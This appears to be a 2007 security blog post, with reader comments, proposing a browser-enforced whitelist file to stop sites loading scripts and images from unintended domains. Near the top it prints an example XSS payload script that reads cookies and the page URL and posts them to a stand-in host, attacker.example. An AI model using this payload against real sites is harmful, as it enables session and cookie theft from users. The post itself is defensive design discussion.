2007-01-09

Server Trust Violation

The more I think about common types of XSS and phishing attacks, and the more of them I perform during blackbox testing, the clearer it becomes that my first goal is usually to get the browser to load malicious script off my own site. The XSS hole usually doesn't offer that big of a payload window, so testing works out better if I keep the injected payload tiny and do the bulk of the scripting in a proper editor, hosted where I control it.
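Roughly, the split looks like this (all of the URLs and endpoint names below are made up for illustration): the injected payload is just a one-liner along the lines of a script tag pointing at https://attacker.example/x.js, and the interesting logic lives in x.js, which I can edit at leisure.

```typescript
// x.js -- a minimal sketch of the externally hosted script, assuming a
// hypothetical attacker-controlled collector at attacker.example.
// It runs in the victim's browser, inside the vulnerable site's origin.
const stolen = {
  cookies: document.cookie, // whatever isn't marked HttpOnly
  page: location.href,
};

// Beacon the data back to the attacker-controlled endpoint.
void fetch("https://attacker.example/collect", {
  method: "POST",
  mode: "no-cors",
  body: JSON.stringify(stolen),
});
```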

On a completely unrelated (I'll put them together in a minute) note, there have been several cases of late where website A includes an image from website B. Rather than downloading the image and giving credit for it, A just references the image directly from B. webmaster@B gets really mad at webmaster@A and replaces the image with something naughty, so users of A see something they really weren't expecting, making webmaster@A look really bad.

And on a third completely unrelated note, there are lots of public script libraries out there, and many of them ask that you use them by including a script URL that points back to their site. The most common ones use information from your account at the script provider's site to build a dynamically-created script.

What's interesting about these three cases is that neither the browser nor the web server has any way of verifying the identity of what they pulled in. The place where I see this being most annoying is in phishing attacks. I use site A to load script from attacker site B into the victim's browser. There's nothing in place that says A can't include script from site B. Now, I have no problem with A legitimately including script loaded from B - but in this case, A didn't REALLY want it.

Should we push for something like robots.txt or favicon.ico - a file the browser automatically loads from a requested domain, containing a whitelist of the sites whose resources that domain intends to load directly? So if A's refwhitelist.txt doesn't include B, any scripts (or images, CSS, etc.) from B aren't loaded?
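One way the enforcement might look from the browser's (or a filtering proxy's) point of view - refwhitelist.txt is hypothetical here, with one allowed origin per line, and the permissive fallback matches the point made in the comments below:

```typescript
// Sketch of how a browser or proxy might enforce a hypothetical
// refwhitelist.txt published at the root of the including site.
async function loadWhitelist(pageOrigin: string): Promise<Set<string>> {
  const res = await fetch(`${pageOrigin}/refwhitelist.txt`);
  if (!res.ok) {
    // No whitelist published: allow everything, so sites that haven't
    // opted in keep working exactly as they do today.
    return new Set(["*"]);
  }
  const text = await res.text();
  return new Set(
    text
      .split("\n")
      .map((line) => line.trim())
      .filter((line) => line.length > 0 && !line.startsWith("#"))
  );
}

// Before fetching a script/image/stylesheet for the page, check its origin.
function isAllowed(whitelist: Set<string>, resourceUrl: string): boolean {
  return whitelist.has("*") || whitelist.has(new URL(resourceUrl).origin);
}
```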

I should probably flesh such ideas out more before publishing, but if you become rich and famous for making a better idea public, be sure to throw me a bone.

3 comments:

  1. Don't forget the other way around either. The problem there isn't XSS but CSRF. So you'd also like a whitelist of domains which are allowed to connect to your server. The latter is actually implemented for XHR from Flash (crossdomain.xml), so it's probably possible to reuse the design.

    A problem which remains with this approach is what to do if you want to load images from domain A but not scripts. You can't use MIME types (or at least you wouldn't want to, since you don't know them before requesting the file), and extensions aren't really trustworthy either. You might use the context in which the resource is included in the HTML, but then you're using knowledge from your application (HTML) in the transport layer (HTTP), which also isn't very good design, imho.

  2. Good input, Mark - I assume you mean that you'd want to check the referrer for particular requests?

    At the browser level, I had also considered having the including site specify hashes of what the included content should be - but if you consistently knew what the hash would be, then the content would have to be static, in which case the including site might as well just host it itself. (A rough sketch of that kind of check appears after these comments.)

    I also considered signing the code. Site A will include content from B, so A and B agree on a signing key in advance, and B has to sign the content with that key. The public part of that key is published on A's site. The browser just has to verify the signature once both pieces are received. The problem with this is that it REALLY stifles the whole sharing idea if you have to conspire with every potential user of your content.

  3. Yes, basically I mean checking the referrer, but just checking the HTTP referrer isn't enough, since it was never designed as a security feature, is fakeable (using Flash), and is stripped by several firewalls.

    Also, another thing we need to consider is what the default configuration will have to be for a site which hasn't implemented this scheme, whatever it ends up being. I can't see any other solution than to allow everything, because otherwise you would break the whole web.

    So since the default configuration for a site would be very unsafe, you want to make it as easy as possible for sites to join. I think that already rules out everything you can't do with Notepad (like hashing and signing). While this may not yield the safest method in the end, that isn't really what we're after either (I think).

    What we want is a method which makes it very easy for a site to limit its XSS problems. And I don't really think most sites include a lot of external resources, other than some ads, so having a small whitelist should probably be enough anyway, right?

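For what it's worth, here is a rough sketch of the hash-checking idea from comment 2, assuming a hypothetical helper rather than any real browser feature: the including site A publishes an expected SHA-256 digest alongside the URL it pulls from B, and the fetched content is only used if the digest matches - which is exactly why it only works for static content.

```typescript
// Hypothetical check for the hash idea in comment 2: fetch the remote
// content, hash it, and only use it if it matches what the including
// site said it should be. Uses Web Crypto for SHA-256.
async function fetchIfHashMatches(
  url: string,
  expectedSha256Hex: string
): Promise<string | null> {
  const res = await fetch(url);
  const bytes = await res.arrayBuffer();

  // Hash the fetched bytes and render the digest as lowercase hex.
  const digest = await crypto.subtle.digest("SHA-256", bytes);
  const actualHex = Array.from(new Uint8Array(digest))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");

  // Hand the content back only if it is exactly what A expected.
  return actualHex === expectedSha256Hex
    ? new TextDecoder().decode(bytes)
    : null;
}
```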